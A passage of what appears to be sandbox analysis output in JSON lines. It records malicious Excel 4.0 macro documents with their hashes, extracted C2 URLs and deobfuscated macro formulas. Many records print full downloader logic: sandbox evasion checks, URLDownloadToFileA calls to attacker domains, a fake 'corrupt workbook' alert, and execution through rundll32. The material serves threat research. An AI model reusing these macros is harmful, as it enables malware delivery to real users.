corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SnXwAmwf4I\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0372be882cf4349bf910a36a3619b20f8516b11e5370046f4fdf21238b426b6"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b0372be882cf4349bf910a36a3619b20f8516b11e5370046f4fdf21238b426b6","filesize":112640,"md5":"fe079cb728fe292d1644d1b5c59240d3","sha1":"017bd4650400c5d52b3f0fd5828723c9466eac11","sha256":"b0372be882cf4349bf910a36a3619b20f8516b11e5370046f4fdf21238b426b6","sha512":"26d4e0f3af1c07d0069b0ec443b1665aac759a78284067b6364c67d968f9077585dd27547d4de22d440b81ad9538f45e794f0a391eeb9599a2b142703e73e550","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0372be882cf4349bf910a36a3619b20f8516b11e5370046f4fdf21238b426b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b039961ba92d4d059d7682c20e71effe24fdca83d3c049ad34bbeeaf9688f055"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b039961ba92d4d059d7682c20e71effe24fdca83d3c049ad34bbeeaf9688f055","filesize":104448,"md5":"0d0628a00071815cc1a1ac373f93866d","sha1":"c5ca003c42435dd03a86d25272624a999f1ed17f","sha256":"b039961ba92d4d059d7682c20e71effe24fdca83d3c049ad34bbeeaf9688f055","sha512":"5ac6ac67dad2ffd7a868f8d3633254b7dd856836c5f184dd26fd57fac54b030c46037342adb6ca01efb780658a68c5accfc584707229f2b85946383b7be0df15","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b039961ba92d4d059d7682c20e71effe24fdca83d3c049ad34bbeeaf9688f055.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"R0UDo4oz5h\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b06f1d8d918f9502f4c14554baf679ba0995db7d6019e3be95668d2a9a13e461"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b06f1d8d918f9502f4c14554baf679ba0995db7d6019e3be95668d2a9a13e461","filesize":168448,"md5":"bc5692bf2b7cfadfd54f1df4884c8bd2","sha1":"b5159248c3479742d4e4a70122e79fd4c7063bfc","sha256":"b06f1d8d918f9502f4c14554baf679ba0995db7d6019e3be95668d2a9a13e461","sha512":"4c996bb72114695976c602253cb3986afe9651cc9d362951102cdd46e341941fd51a85d112c10b09b0815ac7bb99f9eacf316e86f7acf77e633aac4402beae9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b06f1d8d918f9502f4c14554baf679ba0995db7d6019e3be95668d2a9a13e461.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wzpv3EIpev\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b076d169d41cb51e9dd5bb18a4c896a3a81994c211098b35f6480c6f6f9e559c"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b076d169d41cb51e9dd5bb18a4c896a3a81994c211098b35f6480c6f6f9e559c","filesize":185344,"md5":"87aa36373702958e302d73931b6195ec","sha1":"b030828ab3e8145a417bb517df0de1f4ee70971e","sha256":"b076d169d41cb51e9dd5bb18a4c896a3a81994c211098b35f6480c6f6f9e559c","sha512":"80ce8415185bdf35727bf690ac0559abdfc73de18e57c9edf8c36aa00e68cb43cf6a07df3b836642fb0e9fb43f90b9ee35266a8ca9c7be4692a61c9d78b63aa4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b076d169d41cb51e9dd5bb18a4c896a3a81994c211098b35f6480c6f6f9e559c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b07b334fb8f56300157d3eda47c99d729243f20f87c819cd40320dd4d10ab8f3"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b07b334fb8f56300157d3eda47c99d729243f20f87c819cd40320dd4d10ab8f3","filesize":104448,"md5":"6f4de9d0544782848b156f017f461bdb","sha1":"bbc3a0a600b7620ced4f7467fdeef79351e87cdc","sha256":"b07b334fb8f56300157d3eda47c99d729243f20f87c819cd40320dd4d10ab8f3","sha512":"22cb355a645cd9e2f37b282fd6f33ffbc7b0d8c233738ce0534a6096e89961c9f3b360c6307c5f2c7683526b5671c32e0ac39df615fccbb4a50ad1a29c3b860b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b07b334fb8f56300157d3eda47c99d729243f20f87c819cd40320dd4d10ab8f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"OVjgL3imyM\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b08eb4c3ccb6f5bb8fe9d16e227e7ef788c47b7a41d300ead128c4eb367a4a9a"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b08eb4c3ccb6f5bb8fe9d16e227e7ef788c47b7a41d300ead128c4eb367a4a9a","filesize":147968,"md5":"6b7d6d8f1609d06e7439324b8806afd6","sha1":"e01b06696b8849c4c6b22c16fa6abe195b9c6428","sha256":"b08eb4c3ccb6f5bb8fe9d16e227e7ef788c47b7a41d300ead128c4eb367a4a9a","sha512":"0a0d4d037376d6671b1cc709cb32038ed81356d9815f5e66e3340e43ab1dcc2303de2fdfbbd6f6351e02f493941cbf6a0289a93cb7cc4a3e03d517c937014b09","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b08eb4c3ccb6f5bb8fe9d16e227e7ef788c47b7a41d300ead128c4eb367a4a9a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"WwcyJFJwt0\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b09b072ce33bd9116a08ce58e3355095e26087a079b86f96cd89a2e545437c0f"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b09b072ce33bd9116a08ce58e3355095e26087a079b86f96cd89a2e545437c0f","filesize":185344,"md5":"a126977dd7651fcf300325cdde8ea9ac","sha1":"1471ec8939ca70f9c9d4054217df6035e0239996","sha256":"b09b072ce33bd9116a08ce58e3355095e26087a079b86f96cd89a2e545437c0f","sha512":"33ef90cf856e88a346e3e5fd40627f1845723bb27fc9bc3b963881eb3955a765702315ba7dea58e9334ca3aaaeeb45bb183280131239adc44db85fe823d0b5d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b09b072ce33bd9116a08ce58e3355095e26087a079b86f96cd89a2e545437c0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b09f4eb7eb5f3da19c2e761f39444f2ffaa7b79040d36e35f1f59fb5f14d970f"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b09f4eb7eb5f3da19c2e761f39444f2ffaa7b79040d36e35f1f59fb5f14d970f","filesize":221184,"md5":"dd1281bc5551d6bb23df46ddfccc7ec6","sha1":"00cedfa4c94a0146c361a20508a489c07a22e9c4","sha256":"b09f4eb7eb5f3da19c2e761f39444f2ffaa7b79040d36e35f1f59fb5f14d970f","sha512":"00fc5f5dd051eadbc9835e720f56d7569de178a99c3cb269434612b737b9f7b56d883819860efb954ef92fc09542ac16a28acceecdf4a39fdce3df25fb6a6ba2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b09f4eb7eb5f3da19c2e761f39444f2ffaa7b79040d36e35f1f59fb5f14d970f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Y0Em336cqd\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0a083d761308be80e3fbf93fe355fd169cf5a11fed86c4a569b9f7f2dd8cca5"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0a083d761308be80e3fbf93fe355fd169cf5a11fed86c4a569b9f7f2dd8cca5","filesize":206336,"md5":"8e210ff92e84d61446b1e6896b2aac76","sha1":"854cb85fad979edf21f159ecb9414b88c7b34fcb","sha256":"b0a083d761308be80e3fbf93fe355fd169cf5a11fed86c4a569b9f7f2dd8cca5","sha512":"8c27283e8d2924f0f2ce38140108657b25e943a0fa893980023984242caae28538f262d6a3bc9ace0ba645d08a45ae33158afc0def19510d9e9f8995bf287a17","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0a083d761308be80e3fbf93fe355fd169cf5a11fed86c4a569b9f7f2dd8cca5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XSSG0nMjUs\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0b0a2729c68a0b3172c89fe430532f377a2d06ec1bb631800a946ff1b1f27e8"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0b0a2729c68a0b3172c89fe430532f377a2d06ec1bb631800a946ff1b1f27e8","filesize":209920,"md5":"b507656673e479469a849edd6d3ea593","sha1":"7e86b91c4e5a535988de8954021c793c0ad8472c","sha256":"b0b0a2729c68a0b3172c89fe430532f377a2d06ec1bb631800a946ff1b1f27e8","sha512":"f5ad300c9aad7c2595849a95201573bd52497fdf370689046103786566368aa07b113826c8f75f4bdd9cd564bf4215dc87f7aebe9d4fde79c861b319c2c2302c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0b0a2729c68a0b3172c89fe430532f377a2d06ec1bb631800a946ff1b1f27e8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qXrlmVf41n\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0b4b02174f84adc2108048861c448b8372b270974362f9f3f07fb266c8c75d3"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0b4b02174f84adc2108048861c448b8372b270974362f9f3f07fb266c8c75d3","filesize":170496,"md5":"217195aaf2e7475748aeea7cfecad5d2","sha1":"248c1d47d691a4c858bf8bf9836e24b21eeaf5e9","sha256":"b0b4b02174f84adc2108048861c448b8372b270974362f9f3f07fb266c8c75d3","sha512":"1b2d86639e962eda5be8ae37c2cbc49d540272c070d78dd6eae8297f6047371c12af1be62e41dd133c981cf979369b763328f6c2fe83e133865c43d360447a67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0b4b02174f84adc2108048861c448b8372b270974362f9f3f07fb266c8c75d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZdYzSubt9R\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0b8ef6f669fbb90299584c15f95a58c4f7db864b6e455472bdd54af39ffbf6c"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0b8ef6f669fbb90299584c15f95a58c4f7db864b6e455472bdd54af39ffbf6c","filesize":116224,"md5":"e647baeb0cfce2b2a2a8632998f73bb3","sha1":"6a1820255d78dc7888a5162a1b31f7d9057ff65e","sha256":"b0b8ef6f669fbb90299584c15f95a58c4f7db864b6e455472bdd54af39ffbf6c","sha512":"66ade7f9c44b4e87d6820885c6d3bbca4009a799e40d8b476dbed7a1a8ffacb55804c3481ecca740ae69dc0a9954cfa5d09339d74af829679ddf140ddbeb028f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0b8ef6f669fbb90299584c15f95a58c4f7db864b6e455472bdd54af39ffbf6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"clK0M61aXA\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0bb7afd3343e0258238edd06c97c80735f0843e7a5985eb5db3b096daa52eae"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0bb7afd3343e0258238edd06c97c80735f0843e7a5985eb5db3b096daa52eae","filesize":168960,"md5":"03a0750168caa8d01eb7f76d936b45c6","sha1":"11631f789ce9eacfd86003000d52102cbf784c32","sha256":"b0bb7afd3343e0258238edd06c97c80735f0843e7a5985eb5db3b096daa52eae","sha512":"64468af32d2329de3c1febdf90b05a63a18bb16ccab0c8f01ae4d24f8cf2aecc5bb34c43663b0f037d6a1cf3dbb818852597b93c115e47a95a52384b9158d642","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0bb7afd3343e0258238edd06c97c80735f0843e7a5985eb5db3b096daa52eae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IcxOAVxlTf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0cce237399382e130b33310455b289d81e0bdb55f97a48ca1bb5dca82cfc2e2"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0cce237399382e130b33310455b289d81e0bdb55f97a48ca1bb5dca82cfc2e2","filesize":185344,"md5":"64b55d8e68d2a74cd096ca39beb848f4","sha1":"381df72a0e4e7458a1aafad2dbd18b975147e7ca","sha256":"b0cce237399382e130b33310455b289d81e0bdb55f97a48ca1bb5dca82cfc2e2","sha512":"747edd26df7c883dd3c21f4f0e5007157da84c39af4d07d58db9a1928d9cff6d1b52478b921decc978d30922ac11936462cabb654700aa7b1dcff9de642983a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0cce237399382e130b33310455b289d81e0bdb55f97a48ca1bb5dca82cfc2e2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0e75c89ba8a42ee5acd82718d2d52e718143817a046a34e96f37863c3b955d1"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0e75c89ba8a42ee5acd82718d2d52e718143817a046a34e96f37863c3b955d1","filesize":185344,"md5":"23690ca80674632ac902b86df46351a9","sha1":"776c8481b5ee2a06179dac77e928d1b1eeb8d228","sha256":"b0e75c89ba8a42ee5acd82718d2d52e718143817a046a34e96f37863c3b955d1","sha512":"8b4e807e5f3df8633c3a89acbf6bd292901d6ecc8d4f85452c2212c448cbe5f8e53e845707356c3a62d578eef007fb347817e3fd9ab0430739efc19c17eec706","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0e75c89ba8a42ee5acd82718d2d52e718143817a046a34e96f37863c3b955d1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0ee1f40054e9a6435c8ec9250e568662ba7f9e4c281e48b9476010398c509da"},"analysis":{"reported":"2020-04-09T16:18:22Z","score":10},"files":[{"filename":"b0ee1f40054e9a6435c8ec9250e568662ba7f9e4c281e48b9476010398c509da","filesize":209408,"md5":"08c4d275fb383972085318f055d35237","sha1":"ede0c2d015a6f51c1aad5e05846fc60474816f06","sha256":"b0ee1f40054e9a6435c8ec9250e568662ba7f9e4c281e48b9476010398c509da","sha512":"39e35c31a838fd60dcbe4ec1150cb4d1d811a1faf3f55b10f8b04e27e695bfd19712f0afa72fc8468f80dee3fbf2cb6df97aa68de8e10e93aebde548733edc9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0ee1f40054e9a6435c8ec9250e568662ba7f9e4c281e48b9476010398c509da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"69HP0inwTT\",TRUE)\nGOTO(R$1C$10)"}}}]}
